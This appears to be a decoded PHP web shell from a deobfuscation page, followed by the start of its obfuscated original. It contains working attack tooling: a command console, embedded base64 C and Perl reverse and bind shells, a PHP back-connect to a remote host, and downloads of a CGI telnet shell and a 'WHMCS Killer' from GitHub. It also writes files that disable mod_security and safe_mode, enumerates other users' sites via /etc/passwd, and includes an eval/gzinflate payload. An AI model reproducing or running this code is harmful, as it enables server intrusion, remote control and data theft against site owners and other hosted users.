$full = str_replace(${"_SERVER"}["DOCUMENT_ROOT"], "", $dir);
function cgitelnet($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("cgi.new")) {
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
chmod($file_cgi, 0755);
chmod($memeg, 0755);
printFooter();
die();
} else {
if (
cgitelnet(
"https://raw.githubusercontent.com/leetpromax/cgitelnet/main/cgitelnet.pl",
"cgi.new"
)
) {
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
chmod($file_cgi, 0755);
chmod($memeg, 0755);
printFooter();
die();
} else {
echo "<center><font color=red>Failed to Create Cgi Telnet file</font></center>";
printFooter();
die();
}
}
chmod($file_cgi, 0755);
chmod($memeg, 0755);
echo "<br><br><center>[ Done ... <a href='telnet/cgi.new' target='_blank'>Click Here ]</a><br><br></div></center>";
printFooter();
}
function actionConsole()
{
if (isset(${"_POST"}["ajax"])) {
$_SESSION[md5(${"_SERVER"}["HTTP_HOST"]) . "ajax"] = true;
ob_start();
echo "document.cf.cmd.value='';
";
$temp = @iconv(
${"_POST"}["charset"],
"UTF-8",
addcslashes(
"
$ " . ${"_POST"}["p1"] . "
" . ex(${"_POST"}["p1"]),
"
\'"
)
);
if (preg_match("!.*cd\s+([^;]+)$!", ${"_POST"}["p1"], $match)) {
if (@chdir($match[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "document.mf.c.value='" . $GLOBALS["cwd"] . "';";
}
}
echo "document.cf.output.value+='" . $temp . "';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit();
}
printHeader();
echo '<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(""); var cur = 0;
function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur];
else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur];
else
cur--;
} }function add(cmd) { cmds.pop();
cmds.push(cmd); cmds.push("");
cur = cmds.length-1;
} </script>';
echo '<center><h1>Console</h1></center><div class=content><center><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
foreach ($GLOBALS["aliases"] as $n => $v) {
if ($v == "") {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . "</option>";
}
if (empty(${"_POST"}["ajax"]) && !empty(${"_POST"}["p1"])) {
$_SESSION[md5(${"_SERVER"}["HTTP_HOST"]) . "ajax"] = false;
}
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 ' .
($_SESSION[md5(${"_SERVER"}["HTTP_HOST"]) . "ajax"] ? "checked" : "") .
'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
if (!empty(${"_POST"}["p1"])) {
echo htmlspecialchars("$ " . ${"_POST"}["p1"] . "
" . ex(${"_POST"}["p1"]));
}
echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
echo "</form></div><script>document.cf.cmd.focus();</script></center>";
printFooter();
}
function actionLogout()
{
setcookie(md5(${"_SERVER"}["HTTP_HOST"]), "", time() - 3600);
die(
"<html><head><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'><style>body{ background-color:#000; background-image:url('https://i.imgur.com/4bYhdRM.png'); background-size: 32%; margin-top: 90px}#pageheading{font-size:50px; margin-top: 5px}.loginpage img{width: 500px}input{background: white; border-color:#008000b0; border-radius: 5px; margin-top: 10px; padding:5px;} green {color: #008000;font-family: 'Press Start 2P'; font-size: 60px;}</style></head><body> <center> <div class='loginpage'><center><green>KELUAR DARI WEBSHELL</green></center></body></html>"
);
}
function actionNetwork()
{
printHeader();
$back_connect_c =
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c =
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo '<center><h1>Network tools</h1></center><div class=content><center>
<form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<br /><br/><span>Back-connect to</span><br/>
Server: <input type=\'text\' name=\'server\' value="' .
${"_SERVER"}["REMOTE_ADDR"] .
'"> Port: <input type=\'text\' name=\'port\' value=\'443\' size=\'5\'> Using: <select name="using"><option value=\'php\'>PHP</option><option value=\'bcp\'>Perl</option><option value=\'bcc\'>C</option></select> <input type=submit value=">>">
</form><br> <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> <br/><span>Bind port to /bin/sh</span><br/>
Port: <input type=\'text\' name=\'port\' value=\'443\' size=\'5\'> <input type=\'text\' hidden=\'\' value=\'\' name=\'pass\' value=\'\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
</form> <br>';
if (isset(${"_POST"}["p1"])) {
function cf($f, $t)
{
($w = @fopen($f, "w")) or @function_exists("file_put_contents");
if ($w) {
@fwrite($w, @base64_decode($t)) or
@fputs($w, @base64_decode($t)) or
@file_put_contents($f, @base64_decode($t));
@fclose($w);
}
}
if (${"_POST"}["p1"] == "bpc") {
cf("/tmp/bp.c", $bind_port_c);
$out = ex("gcc -o/tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp " . ${"_POST"}["p2"] . " " . ${"_POST"}["p3"] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bp") . "</pre>";
}
if (${"_POST"}["p1"] == "bpp") {
cf("/tmp/bp.pl", $bind_port_p);
$out = ex(which("perl") . " /tmp/bp.pl " . ${"_POST"}["p2"] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bp.pl") . "</pre>";
}
if (${"_POST"}["p1"] == "bcc") {
cf("/tmp/bc.c", $back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc " . ${"_POST"}["p2"] . " " . ${"_POST"}["p3"] . " &");
echo "<pre class=ml1>$out
" . ex("ps aux | grep bc") . "</pre>";
}
if (${"_POST"}["p1"] == "bcp") {
cf("/tmp/bc.pl", $back_connect_p);
$out = ex(
which("perl") .
" /tmp/bc.pl " .
${"_POST"}["p2"] .
" " .
${"_POST"}["p3"] .
" &"
);
echo "<pre class=ml1>$out
" . ex("ps aux | grep bc.pl") . "</pre>";
}
if (${"_POST"}["p1"] == "php") {
$ip = ${"_POST"}["p2"];
$port = ${"_POST"}["p3"];
$sockfd = fsockopen($ip, $port, $errno, $errstr);
if ($errno != 0) {
echo "<font color='red'>$errno : $errstr</font>";
} elseif (!$sockfd) {
$result =
"<p>Unexpected error has occured, connection may have failed.</p>";
} else {
fputs(
$sockfd,
" {################################################################} ..:: BackConnect Php By DigiShell#1337 ::..
{################################################################} "
);
$dir = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$time = Shell_exec("time");
$len = 1337;
fputs(
$sockfd,
"User ",
$sysinfo,
"connected @ ",
$time,
" "
);
while (!feof($sockfd)) {
$cmdPrompt = "[Green]#:> ";
fputs($sockfd, $cmdPrompt);
$command = fgets($sockfd, $len);
fputs(
$sockfd,
" " .
shell_exec($command) .
"
"
);
}
fclose($sockfd);
}
}
echo "</p>";
}
echo "</div></center>";
printFooter();
}
function actionwhmcs()
{
printHeader();
echo "<center><h1>WHMCS Killer</h1></center>";
echo '<div class="content">';
$full = str_replace(${"_SERVER"}["DOCUMENT_ROOT"], "", $dir);
function whmcs($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("whmcs.php")) {
echo "<center><font color=white><br><br><a href='whmcs.php' target='_blank'>[ Whmcs Killer ]</a><br><br><br></font></center>";
} else {
if (
whmcs(
"https://raw.githubusercontent.com/iamhex/WHMCS-Killer-v4/master/whmcs.php",
"whmcs.php"
)
) {
echo "<center><font color=white><br><br><a href='whmcs.php' target='_blank'>[ Whmcs Killer ]</a><br><br></font></center>";
} else {
echo "<center><font color=red>Failed to create whmcs file</font></center>";
}
}
echo "</div>";
printFooter();
}
function actionBypass()
{
printHeader();
echo "<center><h1>Bypass</h1></center>";
echo '<div class="content">';
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED BYPASS |</span></h3>| " .
$GLOBALS["cwd"] .
" |<br />";
echo '<a href=# onclick="g(null,null,\'php.ini\',null)"><br>[ PHP.INI ] </a><a href=# onclick="g(null,null,null,\'ini\')">[ .htaccess(Mod) ] </a>';
if (!empty(${"_POST"}["p2"]) && isset(${"_POST"}["p2"])) {
$fil = fopen($GLOBALS["cwd"] . ".htaccess", "w");
fwrite(
$fil,
'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>'
);
fclose($fil);
}
if (!empty(${"_POST"}["p1"]) && isset(${"_POST"}["p1"])) {
$fil = fopen($GLOBALS["cwd"] . "php.ini", "w");
fwrite(
$fil,
"safe_mode = Off disable_functions=none"
);
fclose($fil);
}
echo "<br><br /><br /></div>";
echo "</div>";
printFooter();
}
function actionAdminer()
{
printHeader();
echo "<center><h1>Adminer</h1></center>";
echo '<div class="content">';
$full = str_replace(${"_SERVER"}["DOCUMENT_ROOT"], "", $dir);
function adminer($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("adminer.php")) {
echo "<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br><br></font></center>";
} else {
if (
adminer(
"https://www.adminer.org/static/download/4.8.0/adminer-4.8.0-en.php",
"adminer.php"
)
) {
echo "<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br></font></center>";
} else {
echo "<center><font color=red>Failed to create Adminer file</font></center>";
}
}
echo "</div>";
printFooter();
}
function actionJumping()
{
printHeader();
echo "<center><h1>Jumping :D</h1></center>";
echo '<div class="content"><center>';
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
($etc = fopen("/etc/passwd", "r")) or
(print "<font color=white>Can't read /etc/passwd</font>");
while ($passwd = fgets($etc)) {
if ($passwd == "" || !$etc) {
echo "<font color=white>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $passwd, $user_jumping);
foreach ($user_jumping[1] as $user_Anonymous_jump) {
$user_jumping_dir = "/home/$user_Anonymous_jump/public_html";
if (is_readable($user_jumping_dir)) {
$i++;
$jrw =
'[<font color=white>R</font>]<a href="#" onclick="g(\'FilesMan\',\'' .
$user_jumping_dir .
'/\')">[ ' .
$user_jumping_dir .
" ]</a>";
if (is_writable($user_jumping_dir)) {
$jrw =
'[<font color=white>RW</font>]<a href="#" onclick="g(\'FilesMan\',\'' .
$user_jumping_dir .
'/\')">[ ' .
$user_jumping_dir .
" ]</a> ";
}
echo $jrw;
if (${"fexists"}("posix_getpwuid")) {
$domain_jump = file_get_contents("/etc/named.conf");
if ($domain_jump == "") {
echo " => ( <font color=white>I can't take the domain name</font> )<br>";
} else {
preg_match_all(
"#/var/named/(.*?).db#",
$domain_jump,
$domains_jump
);
foreach ($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(
@fileowner("/etc/valiases/$dj")
);
$user_jumping_url = $user_jumping_url["name"];
if ($user_jumping_url == $user_Anonymous_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if ($i == 0) {
} else {
echo "<br>Total " .
$i .
" Directory " .
gethostbyname(${"_SERVER"}["HTTP_HOST"]) .
"";
}
echo "</div></pre>";
echo "</div></center>";
printFooter();
}
function actionmailtest()
{
if (!function_exists("posix_getegid")) {
$user = @get_current_user();
} else {
$uid = @posix_getpwuid(posix_geteuid());
$user = $uid["name"];
}
printHeader();
echo '<center><h1>Mail Test</h1></center><div class="content"><center><br>
<table><form name=em onSubmit="g(null,null,\'ems\',this.mailto.value,this.usere.value);return false;"><tr><td><span>Send to: </span></td>' .
"<td><input type=text style=height:25px; name=mailto value=><input type=hidden name=usere value=$user></td><td><input type=submit value=Send></td></tr></form></table><br>";
if (isset(${"_POST"}["p1"])) {
if (${"_POST"}["p1"] == "ems") {
$xx = rand();
$from_add = ${"_POST"}["p3"] . "@" . php_uname("n");
$to_add = ${"_POST"}["p2"];
$subject = "#$xx Result reporting Success";
$message = "Result Report Test - " . $xx . " WORKING !";
$headers =
"From: " .
${"_POST"}["p3"] .
"<$from_add> ";
$headers .= "Reply-To: $from_add
";
$headers .= "Return-Path: $from_add ";
$headers .= "X-Mailer: PHP
";
if (mail($to_add, $subject, $message, $headers)) {
echo "Mail Sent to: ${"_POST"}[p2]";
} else {
echo "Error Sending Email!";
}
}
}
echo "<br></div><br></center>";
printFooter();
}
function actionSelfRemove()
{
if (${"_POST"}["p1"] == "yes") {
if (@unlink(preg_replace("!\(\d+\)\s.*!", "", __FILE__))) {
die("Shell has been removed");
} else {
echo "unlink error!";
}
}
if (${"_POST"}["p1"] != "yes") {
printHeader();
}
echo '<center><h1>Suicide</h1></center><div class=content><center><br>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a><br></center></div>';
printFooter();
}
function actionLock()
{
if (${"_POST"}["p1"] == "yes") {
printHeader();
echo "<center><h1>Lock Shell</h1></center><div class=content><center><br>";
echo "<b style='background:green;'>SHELL LOCKED SUCCESSFULLY</b><br>";
$mass = fopen("test.txt", "w");
fwrite($mass, "test");
echo "<b style='background:black;text-shadow: 0px 0px 0px;'>Reloading....</b><meta http-equiv='refresh' content='1'><br><br><br>";
printFooter();
}
if (${"_POST"}["p1"] != "yes") {
printHeader();
echo '<center><h1>Lock Shell</h1></center><div class=content><center><br><t style="background:blue;text-shadow: 0px 0px 0px;">If You Lock The Shell, No One Can Remove The Shell For A Long Time :D</t><br><a href=# onclick="g(null,null,\'yes\')"><br><b style="background:green;">[ Lock Shell ]</b><br></a><br></center></div>';
printFooter();
}
}
function actionDomain()
{
printHeader();
echo "<center><h1>Local Domains</h1></center><div class=content>";
$KONTOL = @file("/etc/named.conf");
$file = @implode($KONTOL);
$Domain_path = "/var/named";
if (!$file) {
$domains = scandir($Domain_path);
$count = 1;
$dc = 0;
echo "<br><table align=center class=xd width=50% cellpadding=5> <tr class='l1'><td colspan=2>There are : ( <b>" .
count($domains) .
"</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr> <tr><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as &$domain) {
if (stripos($domain, ".db")) {
$domain = str_replace(".db", "", $domain);
}
if (strlen($domain) > 6) {
echo "<tr><td>" .
$count++ .
"</td><td><a href='http://" .
$domain .
"' target='_blank'>" .
$domain .
"</a></td><td>User</td></tr>";
}
}
echo "</table><br>";
} else {
$count = 1;
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
echo "<br><table align=center class=xd width=59% cellpadding=5> <tr ><td colspan=2 > There are ( <b>" .
count($domains) .
"</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr> <tr class='l1'><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
echo "<tr class='l1'><td>" .
$count++ .
"</td><td><a href='http://" .
$domain .
"' target='_blank'>" .
$domain .
"</a></td><td>" .
$user["name"] .
"</td></tr>";
}
echo "</table><br></div>";
}
printFooter();
}
if (empty(${"_POST"}["a"])) {
if (isset($default_action) && function_exists("action" . $default_action)) {
${"_POST"}["a"] = $default_action;
} else {
${"_POST"}["a"] = "SecInfo";
}
}
if (!empty(${"_POST"}["a"]) && function_exists("action" . ${"_POST"}["a"])) {
call_user_func("action" . ${"_POST"}["a"]);
} ?>
Did this file decode correctly?
Original Code
<?php
${"\x50\x61\x73\x73"} = "489ccce7e5eca80381639ee4b4fde09f";
$base64 = "\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65";
$fexists = "\x66\x75\x6E\x63\x74\x69\x6F\x6E\x5F\x65\x78\x69\x73\x74\x73";
@error_reporting(0);
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set("error_log", null);
@ini_set("display_errors", 0);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
$__="\x66\x75\x6E\x63\x74\x69\x6F\x6E\x5F\x65\x78\x69\x73\x74\x73";
if (file_get_contents("test.txt") == "test") {
$name =
"ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHN0ciUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$str =
"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";
$text =
